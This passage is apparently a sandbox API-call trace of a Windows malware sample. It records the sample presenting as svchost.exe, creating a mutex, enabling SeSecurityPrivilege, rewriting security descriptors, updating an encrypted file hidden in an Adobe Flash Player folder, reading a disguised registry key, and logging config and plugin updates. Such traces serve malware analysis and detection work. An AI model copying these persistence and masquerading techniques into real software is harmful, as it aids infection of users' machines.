out: pszDest="F6") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="14") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="59") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="35") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="AA") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="3E") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="27") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="60") returned 2 [0121.402] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0121.403] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0121.403] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0121.403] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0121.403] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0121.404] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0121.404] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0121.404] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0121.404] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0121.405] GetCurrentThread () returned 0xfffffffe [0121.405] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0121.405] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x1f8) returned 1 [0121.405] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0121.407] AdjustTokenPrivileges (in: TokenHandle=0x1f8, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.407] GetLastError () returned 0x0 [0121.407] CloseHandle (hObject=0x1f8) returned 1 [0121.407] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.407] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214610, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0121.407] SetNamedSecurityInfoW () returned 0x0 [0121.433] LocalFree (hMem=0x5214610) returned 0x0 [0121.433] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.434] GetCurrentThread () returned 0xfffffffe [0121.434] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0121.434] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x1f8) returned 1 [0121.434] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0121.436] AdjustTokenPrivileges (in: TokenHandle=0x1f8, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.437] GetLastError () returned 0x0 [0121.437] CloseHandle (hObject=0x1f8) returned 1 [0121.437] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.437] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214400, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0121.437] SetNamedSecurityInfoW () returned 0x0 [0121.440] LocalFree (hMem=0x5214400) returned 0x0 [0121.440] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0121.441] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x735f2b8 | out: lpFileSize=0x735f2b8*=1842) returned 1 [0121.441] VirtualAlloc (lpAddress=0x0, dwSize=0x732, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.441] ReadFile (in: hFile=0x1f8, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x732, lpNumberOfBytesRead=0x735f2c4, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f2c4*=0x732, lpOverlapped=0x0) returned 1 [0121.446] CloseHandle (hObject=0x1f8) returned 1 [0121.446] wvnsprintfA (in: pszDest=0x54138e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366202") returned 10 [0121.447] wvnsprintfA (in: pszDest=0x5413a28, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.450] wvnsprintfA (in: pszDest=0x54138a8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.456] wvnsprintfA (in: pszDest=0x5413a28, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.457] wvnsprintfA (in: pszDest=0x54138e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.458] wvnsprintfA (in: pszDest=0x5413968, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.459] wvnsprintfA (in: pszDest=0x54139a8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.498] wvnsprintfA (in: pszDest=0x54138a8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0121.500] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0121.571] WriteFile (in: hFile=0x230, lpBuffer=0x5403430*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x5403430*, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0) returned 1 [0121.572] CloseHandle (hObject=0x230) returned 1 [0121.651] ReleaseMutex (hMutex=0x1cc) returned 1 [0121.652] CloseHandle (hObject=0x1cc) returned 1 [0121.652] SetLastError (dwErrCode=0x0) [0121.652] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f158 | out: phkResult=0x735f158*=0x1cc) returned 0x0 [0121.653] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f180, lpData=0x0, lpcbData=0x735f168*=0x0 | out: lpType=0x735f180*=0x3, lpData=0x0, lpcbData=0x735f168*=0x220) returned 0x0 [0121.653] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f180, lpData=0x54015a8, lpcbData=0x735f168*=0x220 | out: lpType=0x735f180*=0x3, lpData=0x54015a8*, lpcbData=0x735f168*=0x220) returned 0x0 [0121.653] RegCloseKey (hKey=0x1cc) returned 0x0 [0121.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f42c | out: phkResult=0x735f42c*=0x1cc) returned 0x0 [0121.655] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f458, lpData=0x0, lpcbData=0x735f43c*=0x0 | out: lpType=0x735f458*=0x0, lpData=0x0, lpcbData=0x735f43c*=0x0) returned 0x2 [0121.655] RegCloseKey (hKey=0x1cc) returned 0x0 [0121.656] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0121.656] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f430 | out: lpFileSize=0x735f430*=0) returned 1 [0121.657] CloseHandle (hObject=0x1cc) returned 1 [0121.657] GetLastError () returned 0x0 [0121.657] GetLastError () returned 0x0 [0121.658] GetLocalTime (in: lpSystemTime=0x735f440 | out: lpSystemTime=0x735f440*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x49)) [0121.658] GetCurrentThreadId () returned 0xd70 [0121.658] GetCurrentProcessId () returned 0x2ec [0121.658] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f3e4 | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0121.658] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f460 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0121.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0121.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5415420, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0121.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0121.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5415540, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0013, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0121.660] GetSystemTime (in: lpSystemTime=0x735f030 | out: lpSystemTime=0x735f030*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x49)) [0121.660] SystemTimeToFileTime (in: lpSystemTime=0x735f030, lpFileTime=0x735f020 | out: lpFileTime=0x735f020) returned 1 [0121.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412108, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0121.662] GetUserNameExW () returned 0x1 [0121.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0121.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413068, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="8A") returned 2 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="00") returned 2 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="00") returned 2 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="00") returned 2 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="B7") returned 2 [0121.665] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="49") returned 2 [0121.666] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="67") returned 2 [0121.666] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="98") returned 2 [0121.666] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="F6") returned 2 [0121.666] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="14") returned 2 [0121.666] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="59") returned 2 [0121.667] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="35") returned 2 [0121.667] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="AA") returned 2 [0121.667] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="3E") returned 2 [0121.667] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="27") returned 2 [0121.667] wvnsprintfW (in: pszDest=0x735ee18, cchDest=6, pszFmt="%02X", arglist=0x735edf4 | out: pszDest="60") returned 2 [0121.667] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0121.668] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0121.668] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0121.668] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0121.669] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0121.669] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0121.670] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0121.670] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0121.671] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0121.671] GetCurrentThread () returned 0xfffffffe [0121.672] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f07c | out: TokenHandle=0x735f07c*=0x0) returned 0 [0121.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f07c | out: TokenHandle=0x735f07c*=0x208) returned 1 [0121.672] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f084 | out: lpLuid=0x735f084*(LowPart=0x8, HighPart=0)) returned 1 [0121.675] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f080*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.675] GetLastError () returned 0x0 [0121.675] CloseHandle (hObject=0x208) returned 1 [0121.675] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.675] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214370, lpbSaclPresent=0x735f0b4, pSacl=0x735f0a8, lpbSaclDefaulted=0x735f0b0 | out: lpbSaclPresent=0x735f0b4, pSacl=0x735f0a8, lpbSaclDefaulted=0x735f0b0) returned 1 [0121.675] SetNamedSecurityInfoW () returned 0x0 [0121.695] LocalFree (hMem=0x5214370) returned 0x0 [0121.695] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.695] GetCurrentThread () returned 0xfffffffe [0121.695] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f07c | out: TokenHandle=0x735f07c*=0x0) returned 0 [0121.705] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f07c | out: TokenHandle=0x735f07c*=0x208) returned 1 [0121.705] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f084 | out: lpLuid=0x735f084*(LowPart=0x8, HighPart=0)) returned 1 [0121.706] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f080*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.706] GetLastError () returned 0x0 [0121.706] CloseHandle (hObject=0x208) returned 1 [0121.707] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.707] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214370, lpbSaclPresent=0x735f0b4, pSacl=0x735f0a8, lpbSaclDefaulted=0x735f0b0 | out: lpbSaclPresent=0x735f0b4, pSacl=0x735f0a8, lpbSaclDefaulted=0x735f0b0) returned 1 [0121.707] SetNamedSecurityInfoW () returned 0x0 [0121.709] LocalFree (hMem=0x5214370) returned 0x0 [0121.709] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0121.709] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x735f0c8 | out: lpFileSize=0x735f0c8*=2080) returned 1 [0121.710] VirtualAlloc (lpAddress=0x0, dwSize=0x820, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.710] ReadFile (in: hFile=0x208, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x735f0d4, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f0d4*=0x820, lpOverlapped=0x0) returned 1 [0121.715] CloseHandle (hObject=0x208) returned 1 [0121.715] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366202") returned 10 [0121.716] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.717] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.718] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.719] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.721] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.722] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.723] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366203") returned 10 [0121.805] wvnsprintfA (in: pszDest=0x5413948, cchDest=21, pszFmt="%d", arglist=0x735f018 | out: pszDest="1476366204") returned 10 [0121.806] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0121.822] WriteFile (in: hFile=0x208, lpBuffer=0x5403430*, nNumberOfBytesToWrite=0x922, lpNumberOfBytesWritten=0x735f0cc, lpOverlapped=0x0 | out: lpBuffer=0x5403430*, lpNumberOfBytesWritten=0x735f0cc, lpOverlapped=0x0) returned 1 [0121.823] CloseHandle (hObject=0x208) returned 1 [0121.834] ReleaseMutex (hMutex=0x1cc) returned 1 [0121.834] CloseHandle (hObject=0x1cc) returned 1 [0121.835] SetLastError (dwErrCode=0x0) [0121.835] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f11c | out: phkResult=0x735f11c*=0x1cc) returned 0x0 [0121.835] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x0, lpcbData=0x735f12c*=0x0 | out: lpType=0x735f144*=0x3, lpData=0x0, lpcbData=0x735f12c*=0x220) returned 0x0 [0121.835] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x54015a8, lpcbData=0x735f12c*=0x220 | out: lpType=0x735f144*=0x3, lpData=0x54015a8*, lpcbData=0x735f12c*=0x220) returned 0x0 [0121.835] RegCloseKey (hKey=0x1cc) returned 0x0 [0121.836] GetLastError () returned 0x0 [0121.836] GetLocalTime (in: lpSystemTime=0x735f628 | out: lpSystemTime=0x735f628*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x104)) [0121.837] GetCurrentThreadId () returned 0xd70 [0121.837] GetCurrentProcessId () returned 0x2ec [0121.837] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5cc | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0121.837] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicUpdate::updateplugin, get etag (%d) = %S", arglist=0x735f648 | out: pszDest="DynamicUpdate::updateplugin, get etag (16) = ") returned 45 [0121.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0121.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", cchWideChar=131, lpMultiByteStr=0x5403100, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", lpUsedDefaultChar=0x0) returned 131 [0121.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 